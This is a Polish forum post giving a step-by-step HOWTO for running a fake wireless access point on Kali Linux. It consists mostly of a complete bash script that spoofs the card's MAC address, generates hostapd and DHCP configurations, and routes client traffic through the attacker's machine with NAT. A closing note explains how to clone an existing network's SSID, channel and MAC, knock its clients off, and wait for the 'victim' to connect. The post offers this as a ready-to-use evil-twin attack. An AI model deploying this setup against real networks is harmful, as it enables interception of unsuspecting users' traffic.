Fake AP - HOWTO

Hunter

Użytkownik
Dołączył
Październik 29, 2005
Posty
478
1. Przygotowanie

kupujemy karte wifi z mozliwoscia master-mode w moim przypadku: TP-Link TL-WN822N (ok. 49 PLN) http://www.ceneo.pl/10856354#tab=spec

pobieramy / instalujemy Kali linux - http://www.kali.org/downloads/ (moze byc vmware)

apt-get update ; apt-get upgrade
apt-get install hostapd
apt-get install isc-dhcp-server


tworzymy skrypt generujacy adresacje:
cd /root ; touch hapc ; chmod 700 hapc

w /root/hapc wklejamy:


Kod:
#!/bin/bash
green="\e[0;32m"
red="\e[0;31m"
end="\e[0m"
cyan="\e[0;36m"
echo ===================================
echo "cleaning..."
rm -rf /root/hap_default.conf
pkill hostapd
pkill dhcpd
echo ===================================
echo -ne "${red}"
echo -n "[+] spoof mac address? y/n: "
echo -ne "${end}"
read spf
if [[ "$spf" = "y" ]] ; then
ifconfig $2 down
echo -ne "${cyan}"
echo -n "[1] manual or [2] random: "
echo -ne "${end}"
read spfo
    if [[ "$spfo" = "1" ]] ; then
    echo -ne "${cyan}"
    echo -n "
[*] set new mac address: "
    echo -ne "${end}"
    read mac
    macchanger -m $mac $2
    else
        macchanger -r $2
    fi
fi
echo ===================================
echo -ne "${cyan}"
echo -n "
[*] set wpa2 security? y/n: "
echo -ne "${end}"
read wpa
if [[ "$wpa" = "y" ]] ; then
echo -ne "${cyan}"
echo -n "
[*] set wpa2 password: "
echo -ne "${end}"
read pass
fi
echo -ne "${cyan}"
echo -n "
[*] set N standard? 1/0: "
echo -ne "${end}"
read std
echo -ne "${cyan}"
echo -n "
[*] set invisible broadcast? 1/0: "
echo -ne "${end}"
read brd
echo -ne "${cyan}"
echo -n "
[*] set SSID name: "
echo -ne "${end}"
read ssid
echo -ne "${cyan}"
echo -n "
[*] set ap channel: "
echo -ne "${end}"
read chn
echo ===================================
echo -ne "${green}"
echo "[1] saving config..."
echo -ne "${end}"
echo ===================================
if [[ "$wpa" = "y" ]] ; then
echo "interface=$2" >> /root/hap_default.conf
echo "driver=nl80211" >> /root/hap_default.conf
echo "own_ip_addr=127.0.0.1" >> /root/hap_default.conf
echo "country_code=PL" >> /root/hap_default.conf
echo "macaddr_acl=0" >> /root/hap_default.conf
echo "ignore_broadcast_ssid=$brd" >> /root/hap_default.conf
echo "auth_algs=1" >> /root/hap_default.conf
echo "wpa=2" >> /root/hap_default.conf
echo "wpa_passphrase=$pass" >> /root/hap_default.conf
echo "wpa_key_mgmt=WPA-PSK" >> /root/hap_default.conf
echo "wpa_pairwise=TKIP" >> /root/hap_default.conf
echo "rsn_pairwise=CCMP" >> /root/hap_default.conf
echo "dtim_period=2" >> /root/hap_default.conf
echo "max_num_sta=30" >> /root/hap_default.conf
echo "rts_threshold=2347" >> /root/hap_default.conf
echo "fragm_threshold=2346" >> /root/hap_default.conf
echo "ssid=$ssid" >> /root/hap_default.conf
echo "hw_mode=g" >> /root/hap_default.conf
echo "wmm_enabled=1" >> /root/hap_default.conf
echo "wmm_ac_bk_cwmin=4" >> /root/hap_default.conf
echo "wmm_ac_bk_cwmax=10" >> /root/hap_default.conf
echo "wmm_ac_bk_aifs=7" >> /root/hap_default.conf
echo "wmm_ac_bk_txop_limit=0" >> /root/hap_default.conf
echo "wmm_ac_bk_acm=0" >> /root/hap_default.conf
echo "wmm_ac_be_aifs=3" >> /root/hap_default.conf
echo "wmm_ac_be_cwmin=4" >> /root/hap_default.conf
echo "wmm_ac_be_cwmax=10" >> /root/hap_default.conf
echo "wmm_ac_be_txop_limit=0" >> /root/hap_default.conf
echo "wmm_ac_be_acm=0" >> /root/hap_default.conf
echo "wmm_ac_vi_aifs=2" >> /root/hap_default.conf
echo "wmm_ac_vi_cwmin=3" >> /root/hap_default.conf
echo "wmm_ac_vi_cwmax=4" >> /root/hap_default.conf
echo "wmm_ac_vi_txop_limit=94" >> /root/hap_default.conf
echo "wmm_ac_vi_acm=0" >> /root/hap_default.conf
echo "wmm_ac_vo_aifs=2" >> /root/hap_default.conf
echo "wmm_ac_vo_cwmin=2" >> /root/hap_default.conf
echo "wmm_ac_vo_cwmax=3" >> /root/hap_default.conf
echo "wmm_ac_vo_txop_limit=47" >> /root/hap_default.conf
echo "wmm_ac_vo_acm=0" >> /root/hap_default.conf
echo "ieee80211n=$std" >> /root/hap_default.conf
echo "ht_capab=[SHORT-GI-40][DSSS_CCK-40]" >> /root/hap_default.conf
echo "channel=$chn" >> /root/hap_default.conf
    else
    echo "interface=$2" >> /root/hap_default.conf
    echo "driver=nl80211" >> /root/hap_default.conf
    echo "own_ip_addr=127.0.0.1" >> /root/hap_default.conf
    echo "country_code=PL" >> /root/hap_default.conf
    echo "macaddr_acl=0" >> /root/hap_default.conf
    echo "ignore_broadcast_ssid=$brd" >> /root/hap_default.conf
    echo "auth_algs=1" >> /root/hap_default.conf
    echo "wpa=0" >> /root/hap_default.conf
    echo "wpa_passphrase=test1234" >> /root/hap_default.conf
    echo "wpa_key_mgmt=WPA-PSK" >> /root/hap_default.conf
    echo "wpa_pairwise=TKIP" >> /root/hap_default.conf
    echo "rsn_pairwise=CCMP" >> /root/hap_default.conf
    echo "dtim_period=2" >> /root/hap_default.conf
    echo "max_num_sta=30" >> /root/hap_default.conf
    echo "rts_threshold=2347" >> /root/hap_default.conf
    echo "fragm_threshold=2346" >> /root/hap_default.conf
    echo "ssid=$ssid" >> /root/hap_default.conf
    echo "hw_mode=g" >> /root/hap_default.conf
    echo "wmm_enabled=1" >> /root/hap_default.conf
    echo "wmm_ac_bk_cwmin=4" >> /root/hap_default.conf
    echo "wmm_ac_bk_cwmax=10" >> /root/hap_default.conf
    echo "wmm_ac_bk_aifs=7" >> /root/hap_default.conf
    echo "wmm_ac_bk_txop_limit=0" >> /root/hap_default.conf
    echo "wmm_ac_bk_acm=0" >> /root/hap_default.conf
    echo "wmm_ac_be_aifs=3" >> /root/hap_default.conf
    echo "wmm_ac_be_cwmin=4" >> /root/hap_default.conf
    echo "wmm_ac_be_cwmax=10" >> /root/hap_default.conf
    echo "wmm_ac_be_txop_limit=0" >> /root/hap_default.conf
    echo "wmm_ac_be_acm=0" >> /root/hap_default.conf
    echo "wmm_ac_vi_aifs=2" >> /root/hap_default.conf
    echo "wmm_ac_vi_cwmin=3" >> /root/hap_default.conf
    echo "wmm_ac_vi_cwmax=4" >> /root/hap_default.conf
    echo "wmm_ac_vi_txop_limit=94" >> /root/hap_default.conf
    echo "wmm_ac_vi_acm=0" >> /root/hap_default.conf
    echo "wmm_ac_vo_aifs=2" >> /root/hap_default.conf
    echo "wmm_ac_vo_cwmin=2" >> /root/hap_default.conf
    echo "wmm_ac_vo_cwmax=3" >> /root/hap_default.conf
    echo "wmm_ac_vo_txop_limit=47" >> /root/hap_default.conf
    echo "wmm_ac_vo_acm=0" >> /root/hap_default.conf
    echo "ieee80211n=$std" >> /root/hap_default.conf
    echo "ht_capab=[SHORT-GI-40][DSSS_CCK-40]" >> /root/hap_default.conf
    echo "channel=$chn" >> /root/hap_default.conf
fi
echo -ne "${green}"
echo -n "[2] turn on fake AP? y/n: "
echo -ne "${end}"
read fap
if [[ "$fap" = "y" ]] ; then
echo -ne "${green}"
echo -n "[3] set LAN address (default: 192.168.5): "
echo -ne "${end}"
read net_adr
rm -rf /root/dhcpd.conf
touch /root/dhcpd.conf ; chmod 644 /root/dhcpd.conf
echo "authoritative;" >> /root/dhcpd.conf
echo "ddns-update-style none;" >> /root/dhcpd.conf
echo "default-lease-time 600;" >> /root/dhcpd.conf
echo "max-lease-time 7200;" >> /root/dhcpd.conf
echo "subnet $net_adr.0 netmask 255.255.255.0 {" >> /root/dhcpd.conf
echo "option subnet-mask 255.255.255.0;" >> /root/dhcpd.conf
echo "option broadcast-address $net_adr.255;" >> /root/dhcpd.conf
echo "option routers $net_adr.1;" >> /root/dhcpd.conf
echo "option domain-name-servers 208.67.222.222,208.67.220.220;" >> /root/dhcpd.conf
echo "range $net_adr.100 $net_adr.150;" >> /root/dhcpd.conf
echo "}" >> /root/dhcpd.conf
cp /root/dhcpd.conf /etc/dhcp
rm -rf /root/hap
touch /root/hap
echo "#!/bin/bash" >> /root/hap
echo "pkill hostapd" >> /root/hap
echo "pkill dhcpd" >> /root/hap
echo "ifconfig $2 $net_adr.1 netmask 255.255.255.0" >> /root/hap
echo "route add -net $net_adr.0 netmask 255.255.255.0 gw $net_adr.1" >> /root/hap
echo "echo 1 > /proc/sys/net/ipv4/ip_forward" >> /root/hap
echo "iptables -F" >> /root/hap
echo "iptables -F -t nat" >> /root/hap
echo "iptables -P FORWARD ACCEPT" >> /root/hap
echo "iptables -t nat -A POSTROUTING -o $1 -j MASQUERADE" >> /root/hap
echo "rm -rf /var/lib/dhcp/dhcpd.leases" >> /root/hap
echo "touch /var/lib/dhcp/dhcpd.leases" >> /root/hap
echo "dhcpd -cf /etc/dhcp/dhcpd.conf $2" >> /root/hap
echo "hostapd /root/hap_default.conf" >> /root/hap
echo "exit 0" >> /root/hap
chmod 700 /root/hap
./hap
fi
exit 0

2. Uruchamiamy fake AP

./hapc eth_z_internetem wlan_karta_wifi (w moim przypadku ./hapc eth0 wlan1, jestli wlan0 jest wan'em wystarczy ./hapc wlan0 wlan1)

legenda:

y - tak
n - nie

1 - tak
0 - nie

- spoof mac address? y/n # zmienic mac adres wifi ?
- [1] manual or [2] random # 1 - recznie, 2 - losowo
- set wpa2 security? y/n # uruchomic szyfrowanie wpa2?
- set wpa2 password # wpisz haslo wpa2
- set N standard? 1/0 # uruchomic standard N?
- set invisible broadcast? 1/0 # rozglaszac nazwe wifi?
- set SSID name # wpisz nazwe wifi
- set ap channel # podaj kanal transmisji

- turn on fake AP? y/n # czy uruchomic wifi?
- set LAN address # wpisz adresacje ip np. 192.168.10 dzieki tej opcji kazdy klient otrzyma adresacje z zakresu 192.168.10.100-192.168.10.150 :)

# jak wylaczyc transmitowanie fake WiFi?
ctr+c w terminalu z uruchomionym skryptem

# jak uruchomic poprzednia konfiguracje?
cd /root/ ; ./hap

Ps. jezeli podszywamy sie pod istniejaca juz siec wifi musimy wczesniej rozlaczyc broadcastem wszystkich klientow. Jezeli tego nie zrobimy, ofiara nadal bedzie polaczona ze stara sesja nie rozgloszonego juz SSID (podszyjemy sie pod docellowy AP z wylaczonymi zabezpieczeniami aczkolwiek wszyscy dotychczas aktywni klienci nadal beda korzystac z oryginalnego AP (; ).

Odpalamy wifi bez zabezpieczen o takim samym SSID, kanale transmisji, mac adresie i czekamy az klient sie podlaczy...

# Testowalem na hostapd w wersji 1.0
 
Ostatnia edycja:
Do góry Bottom